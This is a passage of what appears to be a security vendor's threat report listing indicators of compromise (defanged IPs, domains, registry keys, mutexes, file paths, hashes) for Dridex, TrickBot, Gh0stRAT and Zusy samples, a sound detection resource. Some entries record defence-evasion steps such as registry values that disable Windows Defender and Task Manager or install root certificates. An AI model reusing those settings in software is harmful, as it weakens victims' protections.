64[.]233[.]184[.]26/31 72
208[.]76[.]51[.]51 70
40[.]113[.]200[.]201 69
199[.]5[.]157[.]131 68
216[.]239[.]36[.]126 67

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
microsoft[.]com 300
lazystax[.]ru 300
249[.]5[.]55[.]69[.]in-addr[.]arpa 299
microsoft-com[.]mail[.]protection[.]outlook[.]com 299
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 213
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 212
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 212
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 212
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 212
www[.]google[.]com 209
mta7[.]am0[.]yahoodns[.]net 194
mta6[.]am0[.]yahoodns[.]net 187
mta5[.]am0[.]yahoodns[.]net 186
mx2[.]hotmail[.]com 173
mx3[.]hotmail[.]com 165
mx4[.]hotmail[.]com 162
mx1[.]hotmail[.]com 161
authserver[.]mojang[.]com 89
alt2[.]gmail-smtp-in[.]l[.]google[.]com 88
alt1[.]gmail-smtp-in[.]l[.]google[.]com 81
www[.]instagram[.]com 80
gmail-smtp-in[.]l[.]google[.]com 79
alt4[.]gmail-smtp-in[.]l[.]google[.]com 79
whois[.]iana[.]org 78
whois[.]arin[.]net 76

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile 299
%SystemRoot%\SysWOW64\config\systemprofile:.repos 299
%TEMP%\<random, matching '[a-z]{8}'>.exe 281
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 62
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 40
%SystemRoot%\SysWOW64\fymsrzfu 19
%SystemRoot%\SysWOW64\rkyedlrg 18
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 18
%SystemRoot%\SysWOW64\lesyxfla 16
%SystemRoot%\SysWOW64\buionvbq 15
%SystemRoot%\SysWOW64\piwcbjpe 14
%SystemRoot%\SysWOW64\unbhgouj 14
%SystemRoot%\SysWOW64\yrflksyn 14
%SystemRoot%\SysWOW64\xqekjrxm 13
%SystemRoot%\SysWOW64\cvjpowcr 13
%SystemRoot%\SysWOW64\dwkqpxds 13
%SystemRoot%\SysWOW64\nguazhnc 13
%SystemRoot%\SysWOW64\qjxdckqf 11
%SystemRoot%\SysWOW64\athnmuap 11
%SystemRoot%\SysWOW64\ibpvucix 11
%SystemRoot%\SysWOW64\kdrxwekz 11
%SystemRoot%\SysWOW64\haoutbhw 11
%SystemRoot%\SysWOW64\jcqwvdjy 11
%SystemRoot%\SysWOW64\tmagfnti 10
%TEMP%\llkqbpwz.exe 5

*See JSON for more IOCs

File Hashes

00c7f220cf3fccf7a8e5d2ac53cb27be3126b53563bdb2defc3ce67c4cd6ba9d
00fe2d96de4434f3e36ffd74887738104393026f9f363500e3dded2c3b7b1a13
018728665b1aa4d0e306c7c7e361aface06d082a81b8240cdd5f2abfbfd04a3f
02b5ede133f717db614704dafabdebf710b8e2400acb2673ec4f04729804720a
04f15bd44ab9bd713f12069d5e9180b7cbc1df381b51694e7fba4972e39c7721
061870b1ab7a55281e5667651353b7ab7b670a66616209dfb477403c9df64534
0634c076a93cdb11dc93ffdbc315a89ed4c1f2eda3d3a15641b95482dc938c61
076843dd6d91105a079d8f8e26685a1af1121fbd8a48174fb253c762c476f0ea
092e599884795dd6bf7b107016567dc949039e05f842f03fcbc6bde337942ad7
0997c8562ff6d8d9f553b1e4b796bb6e46a7ad41faa17df9a8413e1dd0e00f42
0a91030bff0cc170a6a0aaa3cdf6ad5825230633ab4f4d339a9972d039a493e4
0d1e2e73ae22017ae11d2cbaf1f6d2695a48fe778ce84feece581ca6745d8cbe
0d354fc77a1bea07d4435c7e4368f8d5332aef4b066684236928bcb0113be2c1
0d868fbe90f7a54ae38246fefaa0cc7b20d515a883247fa78af205f045bff23c
0e2404e39bdc4330cfc3d2ec6c9dfe7991fb5e771345941cc04fe42fe7a1c85f
0f128f14781c434604962a0659fd904a222f7fe429c857a87becd4b2d906225b
0ffbffe8f66a655ea5c9f5357b8bda77094bea1a1b5df43bbebb54ba25d82f9f
12697881977defa45bfe2793f13fb56e842fbadfa0a80dc1307eea7c5edf82f0
12fa54a3cfe4894fcfeead54b56416504b37a5fa52cf2a61994340890b9c3344
14583b1e6c65555600bebf7a9fa4844c4c664ab0f100675eb3235879e91fcb04
15f99544c62d303229ddd19fa3aae1570da60db57cae3405a8d43df84f746fa2
1607c665d8d28c4db39d29c8c07a8b8c7fe21fe8e0e37e2f3b0ad622955d3b4a
16ada43aa8e46b888b125de40eaf7f748a38dce334592a0287d9d0b52ec66fbf
16f50ef7e0b66db5a4318c4191674e90848c5b6ab0320b900000f79491d2f3cc
179f865770c398df1b63df901dc9acaa626d1cf8715f53a7efec30b26361d7e2

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Win.Packed.Dridex-9882835-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore 		21
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr 		21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting 		21
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 21
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
142[.]250[.]72[.]110 20
104[.]23[.]98[.]190 11
104[.]23[.]99[.]190 10
209[.]85[.]144[.]100/31 7
23[.]3[.]13[.]88 3
8[.]253[.]132[.]120/31 3
209[.]85[.]144[.]138/31 3
23[.]3[.]13[.]154 2
209[.]85[.]144[.]113 2
172[.]217[.]12[.]238 1
8[.]253[.]131[.]120 1
8[.]253[.]45[.]214 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 21
w[.]google[.]com 21
www3[.]l[.]google[.]com 12
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net 5
www[.]3uvexiaty7[.]com 1
www[.]domnz7vvnb[.]com 1
www[.]ve8ou79uye[.]com 1
www[.]xghhacdq0w[.]com 1
www[.]chqh6mv3sb[.]com 1
www[.]tvszhrwjoe[.]com 1
www[.]dunngvjplt[.]com 1
www[.]xmvxawrtqw[.]com 1
www[.]ezgk3dsdcj[.]com 1
www[.]da5hxzevov[.]com 1
www[.]agnkbjftop[.]com 1
www[.]myi2gu7xf1[.]com 1
www[.]4bgue0iyon[.]com 1
www[.]gbxewhyjj3[.]com 1
www[.]q3cbd5fxkt[.]com 1
www[.]a7hgyy5um9[.]com 1
www[.]pubpioxdsn[.]com 1
www[.]fbhyhbahbl[.]com 1
www[.]ictmfkicjt[.]com 1
www[.]whlzqsc1pr[.]com 1
www[.]f4zsmgym4n[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
<malware cwd>\old_<malware exe name> (copy) 21
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 1

File Hashes

1371aef7db34c881e16b76273a93cff90fbacf51245ff57aca4b226c42a18624
15d67bcb8c8ecc6c2bdab5e567e6ce72803dc45db7e045b7705661f036104638
2053ed6a5d21fb60d25cc2a3c72259c1d1b351e5073000fb2600fa0adff3a1c7
31f3f5a32812614305d4897d56ce82fe1e28a42d1b0deca193fb33e8b6e81561
37694b61b246f2edcb5f468330722eb493886c95be002b537309ec93d8c6cfab
38d93c508d5fb88ace23f6e43f846020aa46e36984eda79f21bf9b5c22d8e72e
3feeed35025505f33ab03fab117af7facdd414d8df8277ae9328301d44518fd1
628995256555303acb50444d50da073d9d937b43023a88ef0fb338517bdf75e2
8d9ad8f6812215694e95740f34de8f44e74bfa19b750a18b6cc1e24804672bfa
9e29f0549d33b313fd51aeac5636beccfa97af032f24ad9082f41e367acedfe6
9f228283bb9e6e650cd543725dd51606f3bc1e6f88503fbd1a42e2b045caa262
a1514a33fc936b1a84e99d65a9ca25e27835db5fe88fb4c811f7da77f176df23
a5617abde6bccdfad7765c6cbcf30be7398838a9267eb085bf659427546a1d00
b48e16bfd3fa581dbb3a87a1ed312dbc14483659aa6650cd003e85762fc42166
c31b80567d3d47c6144ef8bbeae4526d6f5d5418be2bdab406dcf7f878332f8f
cdc0996bd445e0a60d4b9b859a32616c60e1b55d09d346624060e22b70cc612a
df1dc9da3077d9c9399e9a34b2c0b098717afa5f43b2b83abad2b06160c3740c
e3561ef1633239d601fb0320e59d7561d3388ba96ada6a247e87ec095fd8e55a
e3cbd8a4ad64d0fbfc339fa66949fa5d253f422e0a05e9ce1831250993072fdf
ece2043926079ed0a4d3cee8eb4fc92525a4f0d05a3061af1d1a23fe0f42284a
edca0c39cd739068f6785bfd2dc2ffdbfe76da2409e0110d2b3d4fbafe5bfa41

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Win.Dropper.TrickBot-9882885-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 41 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER
Value Name: DisableAntiSpyware 		26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: DeleteFlag 		26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start 		26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableBehaviorMonitoring 		26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableOnAccessProtection 		26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableOnRealtimeEnable 		26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION
Value Name: DisableIOAVProtection 		26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER 26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER\REAL-TIME PROTECTION 26
MutexesOccurrences
Global\316D1C7871E10 26
Global\551AB680DA010 1
Global\9A0C978E5E3932960 1
Global\D870604C8131128 1
Global\7EBA1BA86EA10 1
Global\1B255F507D410 1
Global\8935F1F8C7E10 1
Global\08776A26A89932960 1
Global\6ED45B7A6DE932832 1
Global\31E23F4EFD3932960 1
Global\FF7252924A4932832 1
Global\90833FACFEB1128 1
Global\18F38E8E3A3932960 1
Global\CA2F252894A10 1
Global\62A27AD0EB410 1
Global\9192F476D1D932960 1
Global\4A39609A826932832 1
Global\B5C24E9E3A7932960 1
Global\4CA57236C8D932960 1
Global\AE1D8E4E393932960 1
Global\7D4C23448D11128 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
72[.]22[.]185[.]208 14
72[.]22[.]185[.]200 12
200[.]122[.]209[.]78 2
181[.]209[.]88[.]26 2
193[.]0[.]178[.]20 2
85[.]209[.]162[.]216/31 2
51[.]38[.]101[.]194 1
201[.]184[.]69[.]50 1
51[.]77[.]92[.]215 1
80[.]173[.]224[.]81 1
85[.]143[.]219[.]128 1
173[.]247[.]238[.]184 1
200[.]54[.]14[.]61 1
181[.]129[.]136[.]226 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
crl[.]microsoft[.]com 26
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 26
%ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5 26
%System32%\Tasks\Ms nocsys tools 26
%APPDATA%\nocsys 26
%APPDATA%\nocsys\data 26
%APPDATA%\NOCSYS\<original file name>.exe 26
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1160359183-2529320614-3255788068-500\a18ca4003deb042bbee7a40f15e1970b_24e2b309-1719-4436-b195-573e7cb0f5b1 20
%ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\396de868fa3d0eba3f5795cb816e1bfd_24e2b309-1719-4436-b195-573e7cb0f5b1 20
%APPDATA%\nocsys\settings.ini 20
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt 17
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp 17
%System32%\Microsoft\Protect\S-1-5-18\User\d023035f-3867-4126-9856-b88eb9a40592 12
%System32%\Microsoft\Protect\S-1-5-18\User\a5e679cf-af20-480c-a0f2-3963fe5675cc 7
%System32%\Microsoft\Protect\S-1-5-18\User\9591d337-3013-42e2-b0fa-2b12dfad32af 2
%System32%\Microsoft\Protect\S-1-5-18\User\6d307590-6983-4c3e-9384-847ea5ded675 2
%System32%\Microsoft\Protect\S-1-5-18\User\a14115dc-1d88-41cc-a6ae-38c59745a977 1
%System32%\Microsoft\Protect\S-1-5-18\User\ed05a357-d1a3-479c-87c4-d96ade21ea7b 1
%System32%\Microsoft\Protect\S-1-5-18\User\64c5cd5b-a5ba-4a94-8081-f82e182251b0 1

File Hashes

0136236ef8ed1ff776d345f3ef007e8907fc56b507068824e34281880f340e22
02dd2fe1cd74b60e822ae700a1c4be45139a6aa88a5f81ce5e9a6644d6b2d2d8
057ffc3a33d129bbb509f49bbff396c750f0a5186b30633fee9b05ac544a1a52
0909cc85312268a10d2705100ea2ed5b95eb7ab5f765e41a3a6eb7e4dc5eeaf0
0abccd961e1dd93ab520cd88c2e07a7a2ec4e8a6138f7bcd714cd1cd2743be6f
10005a523b5298601829bd9a87989edefcd5183dc2a305bfcfbdf21b343fd8f0
14c0fd429ed69daddb8b66b41cc4d1630f7dbf5951b52ab1ced2289449fa1b55
14c64c9047b71fce74225216653b3491861d8f9274afa3519ae1976f2b8d76a0
19bf967bfb68ab4aa59264559e857708ab244837403c4797a0f12e9a57221f40
19e74a92942859c1f9d23cf1a924d5232663226e44a64f90712f6d7653d03f25
1afc3ee244bda23d65c3495c30a3ebad2b7a716f6eb62bc02b6ac036082af227
20e629334895d966d0f8dca1835568445b2a06b9ec6830d83861e843effd50bb
214580349cf3ae05528d81615694f7369c76f1d56a6f21f7b8b80ffac6367d2b
220f84942fe3b88473899182473327480a04c25dd27212a97c26c49072c503ca
2224cc59bb76c875cfcf04df8ad82f6c3c4c5418ab0a281bd0cd1ba73d685a1f
27acdc8a6518e083365a5cebd518a98f5755fb2a4b588257b3f052ed3aca2b47
27e3ba58cbb7ab7628e97dab88836edf3525a0137360056fc05e869dac57711a
284b939dbd6258063b3a4d43911635e28926667947435a9697b93661417884e8
287a910ea787f13609d4c8002a0ac86b8068a6fca8bfadb0c1d2b1fb63436b96
2d465c82cfcd0f6121a68ff352d9f97aaa74c7c74527b6d8a9df2514a9ae0797
307e3804d8a677f1c176534c8eb85e63f89421e6a1bf4477485c0a4e3eb9e9d1
32ed191361a69cf8d93f2431fe449a822e812a5f08c9c7e8bb04acc543443a92
3359b593b46b2c55971ab4f5a10228ffd462a8f5fd8b9357a71955b6a1e1e477
36412fd9e0365bd704819e5cdad73b09fd25d1c25014830124d3a9e1bfb1e302
388946f92b46ccb90ceea484407419a9df296d0968a7db7f54c4f859a88e6a4f

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Win.Trojan.Gh0stRAT-9882928-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: Description 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: Type 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: Start 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: ErrorControl 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: DisplayName 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: WOW64 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: ObjectName 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: FailureActions 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: MakeTime 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
Value Name: ImagePath 		15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: Type 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: Start 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: ErrorControl 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: DisplayName 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: WOW64 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: ObjectName 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: FailureActions 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: Description 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: MakeTime 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MNOPQR TUVWXYAB
Value Name: ImagePath 		9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSTUVWX ABC 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSTUVWX ABC
Value Name: Type 		1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSTUVWX ABC
Value Name: Start 		1
MutexesOccurrences
f'Ìð-q’?ÈWö°Ãîg¾Ým^ÂÅe$½{HÀ9Snó–Qt¸G½ 15
f' -q ? W g m^ e $ { H 9Sn Qt G 15
f'Ìð-q’?ÈWö°Ãîg¾Ým^ÂÌn3¤`WÙ"Jyú†A 9
f' -q ? W g m^ n 3 ` W Jy A 9
r: ×®p,œyˆR 1
r: p, y R 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
205[.]209[.]171[.]248 24
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
zxl520[.]f3322[.]org 24
new[.]lmshusheng[.]com 1
Files and or directories createdOccurrences
%ProgramData%\Microsoft\Orhig 8
%ProgramData%\Microsoft\Qyqku 6
%ProgramData%\Microsoft\Orhig\mrbtbz.exe 4
%ProgramData%\Microsoft\Orhig\wbflvv.exe 4
%ProgramData%\Microsoft\Sfzmi 4
%ProgramData%\Microsoft\Umiow 4
%ProgramData%\Microsoft\Qyqku\ewqcyk.exe 3
%ProgramData%\Microsoft\Qyqku\ummkeo.exe 3
%ProgramData%\Microsoft\Mkygs 3
%ProgramData%\Microsoft\Aaaaa\aaaaaa.exe 2
%ProgramData%\Microsoft\Wmiwy\kkesuw.exe 2
%ProgramData%\Microsoft\Mkygs\ewqcyk.exe 2
%ProgramData%\Microsoft\Sfzmi\oguusg.exe 2
%ProgramData%\Microsoft\Sfzmi\mrbtbz.exe 2
%ProgramData%\Microsoft\Umiow\ummkeo.exe 2
%ProgramData%\Microsoft\Umiow\wbflvv.exe 2
%ProgramData%\Microsoft\Sldsw\uhvxbf.exe 2
%ProgramData%\Microsoft\Kjtks\obdhpx.exe 1
%ProgramData%\Microsoft\Syqsw\uuikos.exe 1
%ProgramData%\Microsoft\Ytrym\sfpjxl.exe 1
%ProgramData%\Microsoft\Ipxie\gtfdzv.exe 1
%ProgramData%\Microsoft\Ygeym\sscwky.exe 1
%ProgramData%\Microsoft\Cuwco\iiyeqc.exe 1
%ProgramData%\Microsoft\Usmuk\ccgoeu.exe 1
%ProgramData%\Microsoft\Kwgks\ooquck.exe 1

*See JSON for more IOCs

File Hashes

003adb63e10d8d53c64359025ccc7f8e2a5c36525772877ae35fc2e9dfc99d78
0aae8828caded26a3e8215714b5ebbbfdb228c86f789b7bb41b2b0725965d332
0c1eaa52ac33764845d11706bed4e8b3f398dd7d573eac16b94536e5262ac7c5
119c1f722080cb9ff8129eb27903f61389f87ab474004752ef85f94b77889274
19fbfbf5f4e7810455b45f07f26d9a7b7f10130442afcd878a95d162cec3064d
1a0faa37c83b46952136c44760ba1369c1e72bc27157509b6d5bc8902f5fe781
1a6981f6c95c977c30e067c15e926a26cde853becf6dd54df1f4173fb312406b
233d65d1f2868180ad2d59209556bf8cc5d1e936172166df5f30f9ef270e9576
27e04e17928bbe39602b6e0c6b16645debd820117b3896b995095c0231356c25
28560fc1c09900d876e5a40c8258e000c4b1a44a3032a40076a9e4750f026d0d
2d66eb8615c2b641fa2c7e5c4ea2e23daeb07bc905aadedd09501cfcd3486022
2eeb74b557a12e2cb4963536e527e3ec341acd46b99a0999e9df4ad20916c1ec
3dc1d92c65c62d9b6a165baa2deab1c3144a7697c248cc9bdf2eb90d63f2e559
3e58922d3e088e955703bb59a30fabe4cef697768cc2d289b92801f21981c929
42678de3dc919a231ca774239ef499db0cd5cb84f7172f3e66a161f4853ebef8
4722d036e813fe5bbad2a83e8bb6871f6758d9b35918fd9fb7f54a21d24b2eb6
493fba7232a7c3bd495960a0e12eff6aaf0511ff9bd839b2f0b095a62c04ef4a
4b26d9177fd4a606c48fdda5056a14724ef947211f1331c4a0696a07921cfc0c
4c097ab0a5e6b86fb1caea5e8a12f30b9421ee26c9e2cb16df82415fe4628fde
52716a9ab3eb548b8d0acc688e48e806117ca41e692aec1a9d738a96a833bb03
562eea48e5ff05aa4e14e9d807db121a10ab09344f2c5da72fb3cc26d2b0d698
6622c8a47924a00afe87425f055587048e925019fc88f434901cf602388544ad
682f0a644524e14ab0356e72eb15bf84eb054524d9437d96eb570dfd397b3692
72b14684d28eb0df6173909d7a83e5b54c63f2d78cf46e6f60b9d60fba3828ea
7534321b000b8fb08cd68b854226eb1c7b2cf1a4654d3b2f58f4016f7fd20bb8

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Win.Trojan.Zusy-9883232-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\59FA93603156820ACCEA8EEB6C50D2CD4D77AFE5 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\07C9D3483399ED27657D99C1FC9F5EE6415411E1 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\FA14A75C398DCCEDECEB8DB8C6F147F94399265E 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\59FA93603156820ACCEA8EEB6C50D2CD4D77AFE5
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\2E429959A7C7DA3127D0E12225F164252FA7CCF1 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\BAC11E013ABD0662AC2C7A7B8F649346B806B53D 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\FF97AD2341FE7688EBF9874877F8E6008DDFB93A 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\33BB27004D9105200E7E9485A76609D2C0F7CCBA 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\07C9D3483399ED27657D99C1FC9F5EE6415411E1
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\CFE6DDB9DAD1EFBCE181DDC5206A02799959A2A0 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\FA14A75C398DCCEDECEB8DB8C6F147F94399265E
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\2E429959A7C7DA3127D0E12225F164252FA7CCF1
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\5954078DB0BE70F645D8ACBE8B5DA42D5363345E 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\BAC11E013ABD0662AC2C7A7B8F649346B806B53D
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\33BB27004D9105200E7E9485A76609D2C0F7CCBA
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\62A76DC1A8F49DDE280188C3213AF6DA0BA1DCBC 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\7FB7DE141ED1DF2FCF214B582AEDC7E3AE0D6CF5 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\FF97AD2341FE7688EBF9874877F8E6008DDFB93A
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\98BD02E20E9060688F4E963E9439E3068211B7FF 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\2F6A61576E8383EEF4059A24110508E5CA5C2A4A 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\6420E7C397E284422DD77BA9EC03363ABBB4873A 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\D4C0BF29BECE91F5C8194C5F2AFA462E220FD42E 1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\CFE6DDB9DAD1EFBCE181DDC5206A02799959A2A0
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\5954078DB0BE70F645D8ACBE8B5DA42D5363345E
Value Name: Blob 		1
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\62A76DC1A8F49DDE280188C3213AF6DA0BA1DCBC
Value Name: Blob 		1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
142[.]11[.]206[.]50 25
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
1[.]1[.]168[.]192[.]in-addr[.]arpa 23
localhost 23
1[.]0[.]168[.]192[.]in-addr[.]arpa 17
Files and or directories createdOccurrences
%ProgramData%\Vhxwcgzi.tmp 24
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 24
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cert8.db 23
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\key3.db 23
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js 23
\TEMP\tmp.edb 23
%System32%\LogFiles\Scm\26f915b8-d0da-45d2-b432-bc32eb0c50a3 23
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\prefs.js 17
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\cert9.db 17
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\key4.db 17
